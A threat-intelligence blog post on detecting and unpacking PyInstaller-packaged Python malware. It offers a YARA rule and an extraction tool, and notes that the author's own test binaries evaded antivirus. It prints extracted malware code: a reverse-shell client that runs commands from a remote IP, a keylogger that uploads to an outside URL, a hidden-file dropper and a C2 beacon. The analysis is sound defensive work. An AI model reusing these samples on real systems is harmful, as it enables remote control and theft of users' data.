Crushing Python Malware

Python is a popular choice for aspiring coders and is equally popular with more advanced individuals as well. However, unlike compiled languages, Python scripts must be accompanied by an interpreter; or they will be useless. These interpreters are generally available on Linux and OSX Machines by default, but Windows still does not have an embedded interpreter, forcing users to download one from Python.org or Active State (to name a few) before running the code. Even when the interpreters are present on the system, external libraries may be missing and its difficult to make sure applications are truely capable.

A handful of packages have been created that bundle Python code with an interpreter and all libraries needed to run the code, essentially making Python scripts stand alone binaries that can be distributed to others with ease. PyInstaller and Py2Exe are two of the most widely adopted 'packagers' for Python and when properly utilized can port Python code into stand alone executables for Windows, OSX or Linux machines. PyInstaller is my tool of choice, it has served me well and the executables are generally manageable in size. Keeping in mind it wraps all libraries, scripts and the Python Interpreter into one package, the files generally are between 3meg and 8meg total - significantly larger than a standard C compiled binary but still not unmanagable.

Unfortunately, these packers are also a favorite of some malware authors. After reading a paper on Malware Evasion techniques, I took a hard look at some of the tools available at my disposal. My last C class was 15 years ago, and I'd be lucky to compile anything more than a 'Hello World' application now. I didn't want to spend a lot of time to learning a new language, so I fell back on PyInstaller to help me build some AV Evasion test cases.    The evasion stuff worked better than I expected - without any obfuscation I was able to bypass a majority of the AV checks and launch standard metasploit payloads in memory.

In all of my local tests, I never had an AV engine trip on any of my malicious binaries. The binaries created backdoors, deployed metasploit paylods,created files that appeared to be malicious and acted as droppers for more advanced malware. Due to the surprising success, I went to work generating a very generic Yara Signature to identify possible PyInstaller compiled binaries.

rule PyInstaller_Binary
  {
meta:
    author = "Nicholas Albright, ThreatStream"
    desc = "Generic rule to identify PyInstaller Compiled Binaries"
strings:
    $string0 = "zout00-PYZ.pyz"
    $string1 = "python"
    $string2 = "Python DLL"
    $string3 = "Py_OptimizeFlag"
    $string4 = "pyi_carchive"
    $string5 = ".manifest"
condition:
    all of them // and new_file
}

My goal was to monitor Virustotal for malware that may hit using this technique. More surprising results, dozens of letigitmate binaries each day, from basic video games to text processing tools, a web scraper and a database
interaction tool the binaries I received showed how popular the language really is. It was so many, in fact, that I couldn't possibly sandbox/analyze each and everyone. Luckliy, I knew about a tool called PyInstaller-Extractor, from extremecoders. I'd seen this tool demoed at a security conference and played around with it on some of my own binaries. It works great. My only dislike is that it extracts everything, including modules and the python executables. Sometimes you need to go through another step to actually decompile bytecode. In short, its a great POC, but its messy, and when I'm performing analysis on hundreds of binaries, I want to be a bit more effecient.
I started poking around the PyInstaller install directory and noted a file, pyi-archive_viewer.py. The name sounded promising, so I tried it against a file that matched my Yara signature:

$ pyi-archive_viewer eb17003d98e2cfa3843f24dde7a81d9a
 pos, length, uncompressed, iscompressed, type, name
[(0, 1188261, 1188261, 0, 'z', 'out00-PYZ.pyz'),
  (1188261, 170, 234, 1, 'm', 'struct'),
  (1188431, 1125, 2459, 1, 'm', 'pyi_os_path'),
  (1189556, 4916, 12555, 1, 'm', 'pyi_archive'),
  (1194472, 4043, 13091, 1, 'm', 'pyi_importers'),
  (1198515, 1800, 4228, 1, 's', '_pyi_bootstrap'),
  (1200315, 4370, 13999, 1, 's', 'pyi_carchive'),
  (1204685, 1975, 5591, 1, 's', 'EcdsaBinSign'),
  (1206660, 602, 1857, 1, 'b', 'microsoft.vc90.crt.manifest'),
  (1207262, 317595, 655872, 1, 'b', 'msvcr90.dll'),
  (1524857, 155722, 568832, 1, 'b', 'msvcp90.dll'),
  (1680579, 66835, 224768, 1, 'b', 'msvcm90.dll'),
  (1747414, 1138352, 2459136, 1, 'b', 'python27.dll'),
  (2885766, 5410, 10240, 1, 'b', 'select.pyd'),
  (2891176, 257284, 686080, 1, 'b', 'unicodedata.pyd'),
  (3148460, 381446, 774656, 1, 'b', '_hashlib.pyd'),
  (3529906, 34819, 68608, 1, 'b', 'bz2.pyd'),
  (3564725, 590119, 1201152, 1, 'b', '_ssl.pyd'),
  (4154844, 21412, 46080, 1, 'b', '_socket.pyd'),
  (4176256, 6531, 20956, 1, 'x', 'include\pyconfig.h'),
  (4182787, 269, 479, 1, 'b', 'ecdsabinsign.exe.manifest')]
?


After a bit of fumbling, i found that ? provides more help, and 's' stands for script...
 

? ?
U: go Up one level
O <nm>: open embedded archive nm
X <nm>: extract nm
Q: quit
? X EcdsaBinSign
to filename? /tmp/test-malware.py
? q


Then looking at the generated file:


$ head /tmp/test-malware.py
# Key Gen for NIST224
import argparse
from ecdsa import SigningKey, NIST224p
import hashlib
import ecdsa
import binascii
# Creaet own curves
from ecdsa.curves import Curve
from ecdsa import *


Success!!! I was able to extract ONLY the script I wanted. An hour or so later, I created a wrapper around this script that will handle all of the parsing for me, giving me paged output of the actual important python code. The code is just a POC, but it might help triage binaries within your own environment. Below are some examples (malicious links defanged before posting):

One AV Detection (Virustotal)

$ pyi-deflate.py 4fdf450bf59c79fa3c741e142a61e9e2
# Script: client (Likely Malicious)
    #!/usr/bin/python
    import subprocess,socket
    HOST = '24[.]171[.]140[.]173'
    PORT = 4000
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((HOST, PORT))
    s.send(b'Zombie Alive!')
    while 1:
        data = s.recv(1024)
        if data == b'quit': break
        proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
        stdoutput = proc.stdout.read() + proc.stderr.read()
        s.send(stdoutput)
# loop ends here
s.send(b'Zombie Dead')
s.close()

One AV Detection (Virustotal)

$ pyi-deflate.py 42c52ba89d229d0edff0a39d687f6742
# Script: keyLogger (Likely Malicious)

    import pythoncom, pyHook
    import os
    import sqlite3
    import win32crypt
    import sys
    import threading
    import urllib,urllib2
    import smtplib
    import ftplib
    import datetime,time
    import win32event, win32api, winerror
    import getpass
    import requests

userName = getpass.getuser()
url = 'http://www[.]olacabsucks[.]in/upload.php'
dirPath = os.path.dirname(os.path.abspath(__file__))

    #Disallowing Multiple Instance
    mutex = win32event.CreateMutex(None, 1, 'mutex_var_xboz')
    if win32api.GetLastError() == winerror.ERROR_ALREADY_EXISTS:
        mutex = None
        print "Multiple Instance not Allowed"
        exit(0)
    x=''
    data=''
    counter=1

(cut)


One AV detection (Virustotal)


pyi-deflate.py 5c0d6ddba42309522922e00f8019c9fd
# Script: packer (Malicious)
    from _winreg import *
    import os
    import getpass
    import ctypes

    FILE_ATTRIBUTE_HIDDEN = 0x02

    userName = getpass.getuser()
    dirPath = "C:\ProgramData\xwin"
    exeName = "wfrcen.exe"

    installerPath = os.path.dirname(os.path.abspath(__file__))

    ''' check if installation exists '''
    if (os.path.isdir(dirPath) and os.path.exists(dirPath+ "/" + exeName)) :
          print ""
    else:
          os.makedirs(dirPath)
          ''' copy the exe '''
          readFile = open(installerPath + '\deps\lib\winset.exe','rb')
          printFileText = readFile.read()
          outFile = open( dirPath + '/' + exeName , 'wb')
          outFile.write(printFileText)
          readFile.close()
          outFile.close()

          '''hide the folder and file'''

          ctypes.windll.kernel32.SetFileAttributesW(ur'C:\ProgramData\xwin', FILE_ATTRIBUTE_HIDDEN)
          ctypes.windll.kernel32.SetFileAttributesW(ur'C:\ProgramData\xwin\wfrcen.exe', FILE_ATTRIBUTE_HIDDEN)
(cut)

Four AV Detections (Virustotal):

    $ pyi-deflate.py c3c742450f4388bdcbacfc7d6598d02a
    # Script: windows_amit_bhai (Malicious)
          #############
          #Disc : I am not responsible for negative use of the program.
          #Use It Wisely
          #############

(...cut...)

import socket
          while 1:
            try:

                HOST = '168[.]144[.]144[.]44'
                PORT = 8082 # Arbitrary non-privileged port
                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                s.connect((HOST,PORT))
                break
        except:
                time.sleep(10)

    s.send('Client Connected From: ' + ip + ' Country: ' + country + ' Mac:' + str(mac))

    data = s.recv(1024)

By Successfully extracting only the relevant parts of the code, I could focus my efforts on the next phase of this project - extraction of observables and trying to understand the adversaries using these techniques. There were many more malicious scripts identified. Of all samples, the single highest count of vendors reported maliciousness on Virustotal was 6 detections. None of them were what I'd call enterprise grade AV Solutions and they all missed files obfuscated with pyobfuscate.

It became immediately obvious that code reuse is as popular with Python as any other language. Most of the code blocks were found on forums or Stack Overflow. Everything protected with Pyobfuscate used ctypes to inject known metasploit payloads. I can only state the obvious - they were all quite litterally, script kiddies. Their methods were successful, however.

After pulling down a couple hundred different binaries, I found about 40% failures using my original wrapper script. Closer analysis around the PYZ header shows that the usual zlib header of \x78\x9c was modified, as were other magic numbers. I found about 9 out of 10 of the 40% that failed were easily extracted by reconstructing the correct zlib header and manually carving out the Python scripts.

We are sharing the script as https://github.com/threatstream/labs-tools/blob/master/pyi-deflate.py.

Note: For py2exe packaged binaries, unpy2exe and uncompyle2 combined are equally as successful

Topics:

Cyber Threat Intelligence

Related Content

Get the Anomali Newsletter

The latest Anomali updates and cybersecurity news, delivered straight to your inbox each month.